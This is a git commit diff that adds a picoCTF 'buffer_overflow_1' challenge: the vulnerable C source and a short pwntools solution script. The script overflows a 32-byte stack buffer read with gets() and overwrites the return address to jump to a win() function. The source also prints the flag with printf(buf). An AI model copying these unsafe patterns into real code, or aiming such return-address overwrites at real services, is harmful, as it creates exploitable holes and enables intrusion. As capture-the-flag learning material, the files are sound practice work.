some more playlist stuff

2024-06-08 16:50:43 +02:00
parent 21c2c48ac1
commit 481329e32a
8796 changed files with 212538 additions and 0 deletions
--- a/mochis_tale/binary_exploitation/buffer_overflow_1/sol.py
+++ b/mochis_tale/binary_exploitation/buffer_overflow_1/sol.py
@@ -0,0 +1,11 @@
+#!/home/maxime/.pyvenv/bin/python3
+from pwn import *
+
+conn = remote("saturn.picoctf.net", 63154)
+
+conn.recvline()
+conn.sendline(b'0'*44 + b'\xf6\x91\x04\x08')
+conn.interactive()
+
+conn.close()
+
--- a/mochis_tale/binary_exploitation/buffer_overflow_1/vuln
+++ b/mochis_tale/binary_exploitation/buffer_overflow_1/vuln
--- a/mochis_tale/binary_exploitation/buffer_overflow_1/vuln.c
+++ b/mochis_tale/binary_exploitation/buffer_overflow_1/vuln.c
@@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include "asm.h"
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+
+  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+